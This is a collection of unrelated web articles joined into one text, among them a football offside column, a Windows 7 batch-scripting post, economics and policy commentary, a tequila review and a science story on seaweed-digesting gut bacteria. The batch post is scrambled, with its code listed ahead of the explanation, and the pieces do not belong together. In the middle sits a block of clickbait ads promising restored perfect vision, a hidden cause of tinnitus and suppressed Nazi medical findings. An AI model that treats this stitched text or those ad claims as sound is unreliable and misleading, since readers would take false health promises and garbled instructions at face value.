Sepp Blatter , visionary and forward thinker that he is , has been toying with the idea of abolishing the offside rule in football .
Just toying , you understand , no more than that , but since Blatter 's counterpart in the hockey world , Leandro Negre , revealed details of a conversation between the pair in which the Fifa president asked about the pros and cons of offside being ditched in hockey 12 years ago , one of football 's oldest talking points is back on the agenda , if only as a talking point .
Negre did not have anything negative to say about hockey 's rule change .
Abolishing offside seems to have made the sport more open and attacking and consequently more appealing to spectators , though hockey 's offside rule was not quite the same as football 's in any case .
Nothing is .
Football has considerably more spectators than hockey already , and there appears little need to change what is demonstrably a successful formula , though half the contentious decisions in football are based on offside and an awful lot turn out to be faulty .
There would be interest , to put it mildly , in simplifying the situation so that almost every goal would stand and the game would not have to be constantly brought to a halt for technical offences near the halfway line .
Fifa are usually in favour of more goals being scored , so by extension they will also be interested in fewer goals being disallowed .
Some will view this as heresy , others will simply assume it is more wacky thinking from the ideas factory that not too long ago suggested women footballers should wear tighter shorts , yet it ought to be acknowledged from the outset that football 's offside rule is a bastardised , almost arbitrary version of the norm in other sports .
For a start it has not always been around , different leagues used different interpretations of the offside rule as football developed in England in the 19th century , and the present requirement that two players must be ahead of an attempting to receive or play the ball was only standardised as late as 1925 .
Before that the rule was three players , although in some areas there had been no rule at all .
Secondly , while football began with an understanding of offside similar to rugby 's , that players must always be behind the ball , this was quickly found to be too limiting and altered so that the ball could be passed direct to colleagues further downfield .
Rugby still does not allow this , and the reason forward passes are illegal is because they contravene the offside rule .
It is possible to crosskick in rugby , or hoist a high punt downfield for teammates to chase , but only if they start from an onside position , behind the kicker , when the ball is played .
Football needed to sanction short and long kicks downfield to team - mates in more advanced positions , while preventing the situation whereby " goal - hanging " forwards would station themselves permanently on the opposition 's goal - line and wait for kick - throughs , so eventually , after a fair amount of trial and error , the present compromise was reached .
It is only a compromise , though , and a rule that is less than 100 years old , so it is not inevitable that it will stay unaltered for the rest of time , even if it is extremely unlikely that Blatter or anyone else will scrap it .
The trouble with making such a massive change is that it would change the game massively , and no one can work out in advance whether it would be for the better or not .
The game we know today , for example , a generally open and entertaining one with a good balance between defence and attack , has not always looked that way .
Football as a fast , free - flowing spectacle has been greatly improved by two fairly recent and deceptively slight rule changes .
There was a brief storm of protest when backpasses to goalkeepers were outlawed ( or at least goalkeepers were prevented from picking them up ) , though anyone looking back at old footage from the Seventies and Eighties will wonder how we ever put up with them for so long .
Similarly the 1990 amendment to deem an attacker onside if merely level with the second to last defender was a subtle rewriting of the law that produced an enormously beneficial effect .
Games in the Eighties and early Nineties , an era perhaps typified by the Arsenal back four and the synchronised offside trap immortalised so neatly in The Full Monty , would often take part in such a narrow band of the pitch that all 20 outfield players would move up and down in a co-ordinated stripe .
The most common comment back then was that you could throw a blanket over the lot of them , yet the rule change made a difference , and though it took a few years to work through , rigid last lines fell out of fashion and the game spread out to make use of a much greater area of the pitch .
The Full Monty came out in 1997 , when Tony Adams was still going strong , though by that time his raised hand appeal had already had its heyday .
Were the offside rule to be totally scrapped , no one really knows what would happen .
Goalhangers would certainly come back , though it would appear a fairly simple matter for defenders to be stationed to look after them and that would stretch the game and create more space in midfield .
Good thing , bad thing , who knows ?
The only thing that can be safely said is that it would make a huge difference to the way the game is played , and football as it is currently played seems to be fine by most people .
On the other hand , to put up with the present system is to accept that mistakes will often be made , sometimes as glaring as Jermain Defoe at Wigan last month or Miroslav Klose against Fiorentina in the Champions League .
Both those should have been spotted , though there is at least one decision per game that is so borderline the human eye cannot possibly be expected to always get it right .
The offside rule has built - in imperfections and is bound to create injustices from time to time , yet it works most of the time and presently shapes football to a degree not always fully appreciated .
It will probably be around for a good few years yet .
By Ollie Irish
A version of this post was first published in March 2007
Some Background
The Guts of the Problem
%ALLUSERSPROFILE % \Desktop
%ALLUSERSPROFILE %\Start Menu
script a file copy
pass these paths as parameters to other scripts or programs
or even to open to these locations in windows explorer
%PUBLIC % \Desktop
%PROGRAMDATA %\Microsoft \Windows \Start Menu\
cd %ALLUSERSPROFILE % \Desktop
mkdir test
dir
A Crude but Acceptable Solution
IF DEFINED PUBLIC ( SET AUDESKTOP=%PUBLIC % \Desktop ) & ( SET AUSTARTMENU=%PROGRAMDATA%\Microsoft \Windows \Start Menu ) ELSE ( SET AUDESKTOP=%ALLUSERSPROFILE%\Desktop ) & ( SET AUSTARTMENU=%ALLUSERSPROFILE%\Start Menu )
IF DEFINED PUBLIC ( SET AUDESKTOP=%PUBLIC % \Desktop ) & ( SET AUSTARTMENU=%PROGRAMDATA%\Microsoft \Windows \Start Menu ) ELSE ( SET AUDESKTOP=%ALLUSERSPROFILE%\Desktop ) & ( SET AUSTARTMENU=%ALLUSERSPROFILE%\Start Menu )
ECHO All Users Desktop is at path : %AUDESKTOP %
ECHO All USers Startup is at path : %AUSTARTMENU %
pause
How to Actually Implement It ?
% SystemRoot % \Explorer.exe /n , " %ALLUSERSPROFILE %\Desktop % "
% SystemRoot % \Explorer.exe /n , " %ALLUSERSPROFILE %\Start Menu "
IF DEFINED PUBLIC ( SET AUDESKTOP=%PUBLIC % \Desktop ) & ( SET AUSTARTMENU=%PROGRAMDATA%\Microsoft \Windows \Start Menu ) ELSE ( SET AUDESKTOP=%ALLUSERSPROFILE%\Desktop ) & ( SET AUSTARTMENU=%ALLUSERSPROFILE%\Start Menu )
% SystemRoot % \Explorer.exe /n , " %AUDESKTOP % "
% SystemRoot % \Explorer.exe /n , " %AUSTARTMENU % "
One Final Caveat
This week I installed Windows 7 .
I enjoy many of the new features but have also come across several annoyances .
I expected to have a few issues but those relating to batch scripting and the location of profile information are particularly perplexing .
There may be some rationale behind moving the data but I have n't been able to find an official Microsoft explanation .
At my job we manage thousands of workstations so we 've got a heavily scripted deployment environment .
It is extremely efficient except during transitional periods when we are between operating systems .
Currently , we are testing a lab of Windows 7 machines but will still plan on supporting well over 2000 Windows XP machines for several more years .
My goal is to make the transition to Windows 7 as painless and quick as possible .
Before I can do that however I must get our batch scripts to be cross -OS between Windows 7 and Windows XP .
I 've left out Vista because we never deployed a single Vista machine ( thank goodness ) .
Enough babble , onward !
When writing batch scripts in Windows XP , you can access the All Users Desktop and Start Menu paths using these enironment variables :
These really made it quite easy to ... In Windows 7 , for unknown reasons , the environment variables have been modified and the All Users Desktop and Start Menu paths have been moved to completely separate folders .
So you 'll need to use these variables instead : Technically you could use the Windows XP environment variables , but they do n't work as expected in all situations .
Here is a simple demonstration .
Open an elevated command prompt and type the following 3 commands and hit enter after each line .
Now , look on your Desktop .
The directory " test " was successfully created .
Great !
That part worked .
Now , head back to the command prompt for the bad news .
After you typed the dir command we would expect to see a directory listing that lists the directory " test " .
Instead we are greeted with an empty , unhelpful directory listing that states " File Not Found " .
Well we just created a directory so we know this just is n't true .
Something has gone horribly wrong .
If you want another example of why this is a problem simply type %ALLUSERSPROFILE % \Desktop into Windows Explorer .
You 'll get an access denied message .
Fail .
So we are in a bit of a bind here .
We do n't want to write a bunch of IF / ELSE statements in our scripts but since the paths returned by environment variables are flawed we really do n't have any other choice .
So how can we do this in as few lines as possible ?
Continue below for a 1 line solution that requires some editing of your Windows XP only scripts .
Place the following one line of code ( there should not be a line break ) at the top of your batch scripts then use %AUDESKTOP % or %AUSTARTMENU % to refer to the All Users Desktop and Start Menu respectively .
Here is a little demo script that you can use to make sure the script is working correctly in your environment :
There may be other differences in environment variable names between Windows 7 and Windows XP and this script could certainly handle those if discovered .
Please post them in the comments for the rest of us .
Ok let 's assume you have a simple batch script such as the one below that currently only works in Windows XP but that you 'd like to get working in Windows 7 too .
All it does is open two Windows Explorer windows ( one to the all users desktop and one to the all users start menu ) but is giving you two access denied errors in Windows 7 : Your modified , cross -OS script should read like this and will work properly in both Windows 7 and Windows XP : Voila !
You have a cross browser script .
Now , I admit it is a pain to go through and Find / Replace all the instances of the old style of scripting but if you have a large enough support environment it will be worth your time since you wo n't have to have two versions of the same script and only has to be done this one time .
Remember , when you run batch scripts that access either of these folders you 're going to need elevated ( administrator ) permissions .
This means you need to right click on the script and choose " Run as administrator " .
If anyone finds a better way to implement this or knows of a hidden environment variable that I am missing , please let me know !
2010 BMW 135i – Click above for high - res image gallery
No , this is n't a joke .
Really .
Automotive News reports that BMW CEO Norbert Reithofer shared this statistic during a call with analysts last week .
It is unclear where this information came from within BMW , but it still comes as a staggering surprise that 80 ( eighty ! ) percent of 1 Series owners believe that they are living with front - wheel drive .
As we reported earlier , BMW is planning to bring front - wheel - drive vehicles to market in the near future , and the automaker is worried that it might confuse customers by adding these new products to the rear - drive - only lineup .
Guess not .
We firmly believe that all current 1 Series owners who think their car is front - wheel drive should hand over their keys immediately ... to us .
How much money does it take for governments of sovereign nations to do their job ?
Different countries obviously have different answers .
Countries run by social democratic or socialist parties will spend lavishly on cradle - to - grave social systems .
On the other hand , citizens in non-socialist countries have more choice over how to spend their money .
When Americans think of countries with really big governments , they probably think of Sweden or France or Finland .
Most of Europe is thought to have much larger governments than the United States .
Unfortunately , this is n't true any more .
Even after adjusting for differences in the cost of living and taking into account how many people live in the country , total U.S. government spending -- at all levels of government -- accounts for more real resources per capita than 95 percent of the countries in the world .
In fact , 166 out of 175 countries have governments that spend less money than the United States [ click here for Table 1 ] .
Our government spends 276 percent more than is spent by the average government of another country around the world .
That comes out to about $ 17,400 per person living in the United States -- almost $ 70,000 for a family of four .
Sweden 's famous “ welfare state ” spends only about 8.6 percent more per capita than the United States -- probably a much smaller difference than most would have guessed .
France spends virtually the same amount as the U.S. , just 1.6 percent more .
Meanwhile , Finland spends 6 percent less .
Countries such as Germany , Italy , and the U.K. do n’t even come close to the U.S.
And our neighbor Canada spends 14 percent less per capita than the U.S. Japan spends 32 percent less .
Two of the eight countries where governments spend more than our government likely do so because the government owns the country 's oil wealth ( Qatar and Norway ) .
Looking at government spending alone is n't a perfect way to compare countries .
For example , while the Swedish government rewards parents with a check for each additional child a family has , the United States uses the tax credits and the tax code to accomplish the same goal .
That would make federal government ;s expenditures look relatively smaller even though the end result is the same .
Americans spend more on national defense than most other countries , but the differences in defense expenditures are relatively minor so that comparing non-defense government expenditures does n't make that much difference .
The federal government ’s per capita government expenditures still exceeds that of 93 percent of other countries .
With the new trillion dollar health law signed by President Obama the U.S. total spending and rank is guaranteed to go up further .
The federal government has control over more resources per capita than virtually any other country in the world .
The government decides from whom the money is taken from , who gets it , and how that money can be spent .
Of course , the money also pays for the enforcement of all the regulations and laws that tell us what to do .
That is a huge amount of government control over people ’s lives .
Think about just how much more freedom the average family of four would have if they , not the government , got to determine how that $ 70,000 was spent .
John R. Lott , Jr. is a FoxNews.com contributor .
He is an economist and author of " More Guns , Less Crime " ( University of Chicago Press , 2010 ) , the book 's third edition will be published in May .
Fox Forum is on Twitter .
Follow us @fxnopinion .
In the March issue of BioScience , researchers present a sophisticated new analysis of the effects of boosting use of maize - derived ethanol on greenhouse gas emissions .
The study , conducted by Thomas W. Hertel of Purdue University and five co-authors , focuses on how mandated increases in production of the biofuel in the United States will trigger land - use changes domestically and elsewhere .
In response to the increased demand for maize , farmers convert additional land to crops , and this conversion can boost carbon dioxide emissions .
The analysis combines ecological data with a global economic commodity and trade model to project the effects of US maize ethanol production on carbon dioxide emissions resulting from land - use changes in 18 regions across the globe .
The researchers ' main conclusion is stark : these indirect , market - mediated effects on greenhouse gas emissions " are enough to cancel out the benefits the corn ethanol has on global warming . "
The indirect effects of increasing production of maize ethanol were first addressed in 2008 by Timothy Searchinger and his coauthors , who presented a simpler calculation in Science .
Searchinger concluded that burning maize ethanol led to greenhouse gas emissions twice as large as if gasoline had been burned instead .
The question assumed global importance because the 2007 Energy Independence and Security Act mandates a steep increase in US production of biofuels over the next dozen years , and certifications about life - cycle greenhouse gas emissions are needed for some of this increase .
In addition , the California Air Resources Board 's Low Carbon Fuel Standard requires including estimates of the effects of indirect land - use change on greenhouse gas emissions .
The board 's approach is based on the work reported in BioScience .
Hertel and colleagues ' analysis incorporates some effects that could lessen the impact of land - use conversion , but their bottom line , though only one - quarter as large as the earlier estimate of Searchinger and his coauthors , still indicates that the maize ethanol now being produced in the United States will not significantly reduce total greenhouse gas emissions , compared with burning gasoline .
The authors acknowledge that some game - changing technical or economic development could render their estimates moot , but sensitivity analyses undertaken in their study suggest that the findings are quite robust .
This article is from the archive of our partner .
French feminist philosopher Elisabeth Badinter has written a book calling children unintentional " tyrant[s ] " : motherhood , she argues -- particularly the quest for perfect motherhood with its handmade baby - food , endless breastfeeding , and cloth diapers -- is eating away at feminism 's prior gains .
Thank goodness , she says , for France 's slight resistance to this trend : " We 've always been mediocre mothers here , " the Times quotes Badinter as saying , " But we 've tended to have happier lives . "
Unsurprisingly , this is causing a stir , and not just in her native France .
People are also riled up in England and in the United States .
Is Badinter attacking mothers ?
Attacking environmentalism ?
Here 's a sample of the Rorschach - like responses across three countries , as well as Badinter 's rebuttal .
Well , Decent Point , says " women 's lifestyle trends researcher " and blogger L. Anne Enke .
In spite of the claims of their therapy - ridden children who will never forgive seventies moms for having the audacity to utter the words " I am a person , not just a ' womb for future occupants ' " ... maybe the divinely - devoted , heaven - sent , totally selfless mom is n’t actually best for her children or the world 's social institutions , or governments or business .
Environmentalism
Is n't in Conflict with Feminism Treehugger 's Jaymi Heimbuch thinks women getting " guilt[ed ] into roles they do n't wish to fulfill ... [ is ] sexism using the green movement is cover . "
Men can wash disposable diapers just as easily as women .
Or Maybe It Is " Of course , " says William Teach at ultra-conservative Stop the ACLU , " it is the Left who tends to , in practice , expose themselves as true sexists . "
He points to the " treatment of Sarah Palin and Hillary Clinton .
And the greenies tend to be primarily composed of …… leftists ! "
My Point 's Really a Very Simple One Badinter , clarifying her argument in an interview with French paper Le Monde , says she 's not saying the problem is purely about environmentalism , but rather " a group of movements " : the increased emphasis on what is natural winds up being " regressive , " forcing women back into roles . that earlier generations worked so hard to throw off .
But Badinter scoffs at the notion that men are about to wash the green movement 's beloved cloth diapers : " when I hear [ someone ] say [ that ] , I wonder what world she is living in . "
You Faux - Feminist !
Thomas Lancelot , a self - described " militant feminist , " lays into Badinter in Le Monde for her inattention to " concrete matters " like women 's material circumstances .
Clearly , says Lancelot , Badinter " prefers to keep her hands clean by , from [ the comfort of ] her living room , not attacking anything but those disagreeable naturalist ideas . "
The Problem Is n't Environmentalism So Much as Cupcakes The Times ' India Knight zeroes in on this baked good as " the symbol of a whole load of weirdness , wishful thinking and guilt . "
With the advent of Nigella Lawson et al. , says Knight , we 've come to " a strange sort of reality which ended up with women feeling they were n't worth their salt if they could n’t rustle up a batch of cupcakes in their 1950s - retro kitchen . "
And the 1950s bit is part of it , too , says Knight , who takes a moment to make a broader point about those fantasies of " well mannered ... teenagers ... home - baked bread ... marvellous local shops , " and a kitchen garden :
If you think about it , just about everything people are nostalgic for in the 21st century was achievable only if women stayed at home with a fully employed male workforce and , by extension , spouses and children who were financially secure .
Getting Back to Childcare
This topic was bound to come up somewhere in the discussion , and the Guardian 's Marie - Helene Martin does the honors .
She thinks the elephant in the room here is affordable childcare , which France , in fact , has in spades but which is not so common elsewhere .
This article is from the archive of our partner The Wire .
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
Moving enterprise IT software to the cloud is n’t just a technology issue , it ’s software support entitlement issue as well .
Red Hat Cloud Access extends Linux subscription model for cloud computing deployments on Amazon EC2 .
Linux vendor Red Hat ( NYSE : RHT ) today is unveiling a new program dubbed Red Hat Cloud Access through which current Red Hat Enterprise Linux subscribers can leverage their existing support subscriptions for cloud deployments .
With Red Hat Cloud Access , enterprises that have Red Hat Enterprise Linux premium subscriptions can move them to Amazon ’s EC2 cloud .
As a result , Red Hat is enabling its customers to migrate to the cloud with their existing subscriptions .
Red
Hat is also now set to ensure that the Amazon images of its Red Hat Enterprise Linux are consistent with the version updates that enterprises deploy on - premises .
“ This goes a long way to making it clear how customers work with Red Hat in public clouds , ” Mike Ferris , director of product strategy for Red Hat ’s cloud solutions , told InternetNews.com .
Management of the public cloud deployment can also be enabled via Red Hat ’s Network Satellite provisioning and management tool .
Moving subscriptions to the cloud is n’t just a one - way migration , either .
Ferris said he expects that enterprises taking advantage of Red Hat Cloud Access will move current on - premises RHEL subscriptions up to the cloud while also may move subscriptions back from the cloud to on - site as needed .
The move to simplify the way Red Hat works with its customers on the cloud comes as rival vendor Ubuntu ramps up its own cloud strategy .
Red Hat has been offering its Red Hat Enterprise Linux ( RHEL ) on Amazon for several years .
Ferris noted that to date the Amazon instances of RHEL have been in beta with limited support .
He added that Red Hat used the beta to help determine what customers wanted and how they ’d use the public cloud with RHEL .
“ Now we ’re making sure that customers have a consistent relationship with Red Hat , ” whether it ’s on - site or in the cloud , Ferris said .
Sean Michael Kerner is a senior editor at InternetNews.com , the news service of Internet.com , the network for technology professionals .
Follow ServerWatch on Twitter
Windows Experience
News and features for people who use and are interested in Windows , including announcements from Microsoft and its partners .
Perfect 20/20 Vision with THIS
Want eyesight that actually gets BETTER with age — instead of worse ?
I know it sounds crazy , but one renowned Harvard - trained M.D. says now it ’s finally possible .
He ’s got research that shows seniors can even turn weak , aging eyesight back into PERFECT 20 / 20 vision again .
And that means NEVER needing reading glasses again .
He says anyone can do it starting in [ … ]
Read
REVEALED : The Shocking Cause of Ringing Ears An Ivy League trained doctor has uncovered the shocking true cause of tinnitus .
And get this …
It has NOTHING to do with your ears .
But , rather , with this one alarming thing happening inside your body right now .
If you ’re dealing with occasional ringing , buzzing , hissing , or clicking in your ears … [ … ]
Read
Try This
In 1944 , an experiment was done in this Nazi medical center …
Take a look at the circled window in this photo… .
A medical experiment commissioned by Adolf Hitler was done here in 1944 .
Our own US Government has ignored the important scientific results of this experiment .
While they ’re still available , go here to see them .
Do you know the “ insider ’s tip ” to growing thick , sexy hair ?
It ’s doctor - developed , approved , and even recommended …
Because it could help you regrow your hair for good .
If you want my “ insider ’s tip , ” please click here now .
But hurry !
It wo n’t be available for much longer .
>>>>
Click here now to start growing thick , sexy hair .
TYLER COWEN sent out a tweet this morning :
I would like to see a time plot of when various economists announce that leaving the Euro is a ) OK , b ) desirable , and c ) necessary .
Opinion on the irreversibility of the decision to join the euro zone was established , among many economists , by Barry Eichengreen , who argued back in 2007 :
The insurmountable obstacle to exit is neither economic nor political , then , but procedural .
Reintroducing the national currency would require essentially all contracts – including those governing wages , bank deposits , bonds , mortgages , taxes , and most everything else – to be redenominated in the domestic currency .
The legislature could pass a law requiring banks , firms , households and governments to redenominate their contracts in this manner .
But in a democracy this decision would have to be preceded by very extensive discussion .
And for it to be executed smoothly , it would have to be accompanied by detailed planning ...
The very motivation for leaving would be to change the parity .
And pressure from other member states would be ineffective by definition .
Market participants would be aware of this fact .
Households and firms anticipating that domestic deposits would be redenominated into the lira , which would then lose value against the euro , would shift their deposits to other euro - area banks .
A system - wide bank run would follow .
Investors anticipating that their claims on the Italian government would be redenominated into lira would shift into claims on other euro - area governments , leading to a bond - market crisis .
If the precipitating factor was parliamentary debate over abandoning the lira , it would be unlikely that the ECB would provide extensive lender - of - last - resort support .
And if the government was already in a weak fiscal position , it would not be able to borrow to bail out the banks and buy back its debt .
This would be the mother of all financial crises .
But today , Paul Krugman says he 's re-evaluating whether this argument is relevant in the Greek situation :
[ T ]he Eichengreen argument is a reason not to plan on leaving the euro — but what if the bank runs and financial crisis happen anyway ?
In that case the marginal cost of leaving falls dramatically , and in fact the decision may effectively be taken out of policymakers ' hands .
Actually , Argentina 's departure from the convertibility law had some of that aspect .
A deliberate decision to change the law would have triggered a banking crisis ; but by 2001 a banking crisis was already in full swing , as were emergency restrictions on bank withdrawals .
So the infeasible became feasible .
Think of it this way : the Greek government cannot announce a policy of leaving the euro — and I 'm sure it has no intention of doing that .
But at this point it 's all too easy to imagine a default on debt , triggering a crisis of confidence , which forces the government to impose a banking holiday — and at that point the logic of hanging on to the common currency come hell or high water becomes a lot less compelling .
This seems reasonable , but I think we run into trouble when we hit Mr Krugman 's next paragraph :
And if Greece is in effect forced out of the euro , what happens to other shaky members ?
That 's the rub .
Bank runs and crisis in Greece simply are n't enough to threaten the European or global financial system .
Total foreign exposure to Greek debt is a little over € 200 billion .
But a Greek exit from the euro zone would inevitably lead to concern that similar departures might be in store for other troubled nations .
And a run on Spanish and Italian banks is a much , much bigger deal .
Debt exposure moves from the hundreds of billions to the trillions of euros .
Suddenly things look very bad .
The trouble is that Mr Krugman is right : from the Greek perspective a euro departure begins making a lot of sense .
If you 're going to be saddled with the bank runs and crisis , you may as well get devaluation to go with it .
I 'm not sure that over the long - term life outside the euro will be better for Greece ( and it 's hard to imagine them ever getting back in ) , but politicians tend not to make decisions based on the long - term .
So what do you do when Greece indicates that maybe it wants to leave the euro ( particularly when a lot of Germans would be happy to see them go , damn the consequences ) .
I think it 's important to make Greece a generous enough offer that departure seems like the less palatable choice .
And that leads toward the necessary adjustements in Europe 's fiscal institutions ; there must be more scope for transfers across the euro zone if the currency area is to stay together .
Wireless headphones are convenient , but they come with a host of tricky troubleshooting problems .
Here 's how to fix them all .
After a bender trip in Mexico after high school I swore off drinking any and all tequila .
In the late 80’s and early 90 ’s that probably was n’t a bad thing to do ( the big selling point of many tequilas was that they had a worm in the bottle ) .
Flash forward many years and a friend of mine urged me to try a shot of Patron Tequila .
It became clear just how far tequila has come .
Soon after trying Patron , I discovered a wide range of tequilas and mezcal which I enjoyed much more .
I found I enjoyed the complexity of flavors beyond the simple pepper note of Patron and ones which were not so overbearingly fiery on the finish .
I was intrigued when I found out that Yeyo Tequila is being imported and distributed out of Beaverton , Oregon , a city more associated with companies like Nike and Intel than spirits .
Yeyo , oddly enough , is actually a slang term used in Spanish for cocaine .
When I asked Jon Bullinger , founder of Unique Liquid , LLC ( the importer ) about the title he referred me to the Yeyo website which defines Yeyo as “ traditional distilling with a modern twist ” .
It ’s an interesting take , but I think he delights in knowing that many people will order this tequila with a smile , knowing what they ’d be getting if they asked for “ yeyo ” in Mexico .
I actually like the name and branding for Yeyo .
The sanded glass bottle is very stylized and modern but still quite classic .
All the slick branding in the world does n’t mean much unless what ’s inside delivers , and Yeyo does really deliver .
Yeyo Ultra Premium Silver Tequila has a nice clean soft peppery sweet nose with some mineral undertones .
The nose is a lot softer than you ’d expect for an 80 proof spirit and it held its nice soft properties even when I swirled it around in my glass ( no real strong alcohol vapors ) .
The taste follows the nose pretty closely with sweet peppery tones ; it does have some hints of fire but they are extremely well balanced with the sweet and pepper notes .
I found it to be fairly buttery and creamy with a very nicely balanced mouth feel .
The finish is long and gradual with nice sweet pepper and some very light spice .
What stands out the most about Yeyo is how well balanced it is .
This tequila is exceptional dialed in , with just the right mix of pepper , sweet and spice .
It ’s extremely easy drinking and won over all the members of our tasting panel .
I road tested Yeyo in a Tequila Old Fashioned and was very happy with the results .
Here ’s the Tequila Old Fashioned recipe I used :
1 1/2oz of Yeyo Tequila
1/2 tsp of Agave
2 dashes of orange bitters
Yeyo Tequila is being sold in Oregon and Washington at $ 46.95 a 750 ml bottle .
Yeyo Ultra Premium Silver Tequila Rating :
Highly Recommended – an exceptionally drinkable and balanced tequila at a fantastic price point
North Americans just do n’t get it ( Image : Vasiliki/iStock )
Sushi arms the guts of the Japanese with new digestive powers .
A seaweed - eating enzyme seems to have jumped from marine bacteria to the harmless bugs that call the intestines of sushi-eaters home .
This is the first evidence that food bacteria can transfer genes to our own gut bacteria , and could help us extract more energy from food , says Mirjam Czjzek at the National Centre for Scientific Research ( CNRS ) in Roscoff , France .
Czjzek ’s group uncovered the genetic swap while hunting the genes for certain enzymes produced by bacteria .
These enzymes break down carbohydrates in the cell walls of the algae that the bacteria feed on .
Advertisement
One enzyme , porphyranase , breaks down a polysaccharide that makes up around 40 per cent of the cell walls of Porphyra , a red alga used to make the nori sheets that wrap around sushi .
The carbohydrate is rare in most other marine plants , however .
The enzyme turned up in samples of marine bacteria , but also , curiously , the gut of a Japanese person .
“ We thought this was a funny coincidence , especially as Porphyra is used in sushi , ” says Czjzek .
The guts for sushi
To see if a gene for the enzyme was present in the microflora of other Japanese people , Czjzek ’s team looked up a previous study of Japanese and North American guts .
The gene was not found in any North American , but the group found porphyranase genes in 5 of the 13 Japanese .
“ The number is low , ” says Czjzek .
“ But we can say that apparently this enzyme is present only in Japanese and not in [ North ] Americans . ”
She thinks the difference is due to the seaweed - rich diet of Japanese people , who eat an average of 14.2 grams of the stuff a day .
Genes regularly shuttle between different bacteria , offering each other new traits such as drug resistance .
But this is the first time a gut bacterium has been found to have got new genes from its host ’s food .
In theory , Japanese people with the porphyranase enzyme can digest seaweed , while it passes straight through the North American gut .
“ It ’s a really nice demonstration of genetic variation of microbiota between individuals , ” says Justin Sonnenburg , a microbiologist at Stanford University in California .
He agrees that the gut bacteria from the Japanese people probably use the enzyme to break down seaweed carbs .
But non-Japanese readers should n’t rush off for a sushi fix to “ grow your own ” porphyranase enzymes just yet .
Supermarket seaweeds are commonly roasted to sterilise them , Czjzek says .
“ If the algae are roasted before preparing sushi , the microbes are destroyed , and the genes are not transferred . ”
Journal reference : Nature , DOI : 10.1038/nature08937
hellocatfood
lacruzjd
lacruzjd
dennisv
Sorry about the delay in getting this up .
The contest is officially closed !
It looks like it 's time to start voting .
Following is the list of all entries and who they were by .
Everyone gets 1 vote and all entrants may of course vote as well .
To vote , just reply to the journal entry stating the entry number that you would like to vote for .
Voting will ONLY be accepted via DA and will be open through April 25th .
Once the preliminary voting is done , the top 3 will be passed on to the developers to have the final vote for the winner .
Any entries that are not up to snuff by the end of voting will be disqualified .
This means the SVG needs to be online , the work needs to licensed correctly ( CC BY - SA ) , and the size needs to be correct .
However , ANY other modifications of the files is prohibited .
Good luck to all who entered !-- 1.by2 . : thumb158082056 : by3.by4.by5.by6.by7.by8.by9. www.disegnodesign.com/gui_for_… by10.by11 . : thumb159344512 : by12.by13.by14 . :thumb159511586 : by15.by16.by17.by18.by19.by20.by21.by22.by23.by24.by25.by26.by27.by28.by29.by30 . : thumb160759006 : by31 . : thumb160761144 : by32 . : thumb160775788 : by33.by34.by35.by36.by
OUT of work ?
Has Holiday
Inn got the job for you .
International hotel chain Holiday
Inn is offering a trial human bed - warming service at three hotels in Britain this month .
If requested , a willing staff - member at two of the chain 's London hotels and one in the northern English city of Manchester will dress in an all - in - one fleece sleeper suit before slipping between the sheets .
The bed - warmer is equipped with a thermometer to measure the bed 's required temperature of 20 degrees Celsius ( 68 Fahrenheit ) .
And because someone is sure to ask :
Holiday
Inn said the warmer would be fully dressed and leave the bed before the guest occupied it .
They could not confirm if the warmer would shower first , but said hair would be covered .
Also :
Holiday
Inn are promoting the service with the help of sleep - expert Chris Idzikowski , director of the Edinburgh Sleep Center , who said the idea could help people sleep .
Indeed , nothing is more comforting to me when I 'm trying to sleep than the idea that only minutes earlier a complete stranger was lying in my bed .
PHOENIX — Arizona is well accustomed to the derision of its countrymen .
The state resisted adopting Martin Luther King ’s birthday as a holiday years after most other states embraced it .
The sheriff in its largest county forces inmates to wear pink underwear , apparently to assault their masculinity .
Residents may take guns almost anywhere , but they may not cut down a cactus .
The rest of the nation may scoff or grumble , but Arizona , one of the last truly independent Western outposts , carries on .
Now , after passing the nation ’s toughest immigration law , one that gives the police broad power to stop people on suspicion of being here illegally , the state finds itself in perhaps the harshest spotlight in a decade .
The law drew not only the threat of a challenge by the Justice Department and a rebuke from the president , but the snickers of late - night comedians .
City councils elsewhere have called for a boycott of the resort - driven state ; one trade group of immigration lawyers has canceled a conference planned for Scottsdale at a time when the state is broke and desperate for business .
Meanwhile , a continuous protest is taking place at the State Capitol .
It 's shaping up to be a truly titanic battle .
According to Unite , BA has told the independent conciliator , ACAS , that it will not put its offer back on the table .
With this kind of approach and time running out , the strike is all but certain to go ahead this Saturday .
Why has BA done this ?
You'd think in the case of something close to mutually assured destruction , BA would seize upon the opportunity to avoid a damaging strike , especially when it 's making huge losses .
Yet , here 's the rub .
Yes , BA will lose £ 100 m in the strike , but the prize for it is much bigger .
That prize is the decimation of Unite as a serious force in BA .
With Unite put in its place , BA will be able to instruct its cabin crew to do exactly as its wants .
It will say " jump " and the cabin crew will have no choice but to say " how high ? "
Then BA will be able to take part in the race to the bottom on wages and conditions alongside competitors such as Virgin .
For this plan to work , the strike must go ahead and the strike must be defeated .
That is why BA has spent inordinate amounts on ways to break it and why it has spent months intimidating cabin crew out of striking .
It might also explain why BA has not sought an injunction again to stop the strike .
Months of planning for the showdown would not lead to the outcome it wants if it won an injunction .
BA may even sense it has Unite on the run , given the union 's willingness to look more favourably on a deal it rejected last week .
Unite may feel on the run after being attacked by not just the Tories but by the party it funds .
In industrial relations jargon , this is a classic " reforming conflict " .
The employer engages in a set - piece showdown , inflicts a massive defeat on the union , divides the workforce and thus re-orders the power relations between management and union .
This should sound familiar if you cast your mind back over the many classic industrial disputes since 1979 – the miners , the printers , the Liverpool dockers , the firefighters and so on .
The employers , state or private , were backed politically by the governments of the day so that the workers and their unions became bête noires and the forces of the police and judiciary were ranged against them .
In many of these disputes you could find henchman as equally determined as BA 's Willie Walsh .
These disputes were all serious defeats but does this historical pattern have to be continued in this present dispute ?
The omens are not good .
By law , employers have both time and opportunity to prepare to offset a strike 's effect .
That is why the anti-union laws require unions to give various advance notices of the action and who is taking it .
But Unite is the country 's biggest union .
It could , out of solidarity and self - interest , institute a £ 1 a week levy on its 1.4 m members to show that it is prepared to bankroll a long strike .
Even though BA has huge cash reserves , facing a long strike is not in its game plan .
A longer strike would allow Unite to get more political pressure put on BA as we get closer to the general election .
If Unite cannot pull such an ace out of its hand , BA will go back to the way it used to be run and the way many other companies are now run .
Lord King , appointed by Thatcher as BA chief to oversee preparations for its privatisation , was asked how he motivated his employees .
He answered with just one word – " fear " .
That fear was fear of the dole .
Gregor Gall is research professor of industrial relations at the University of Hertfordshire
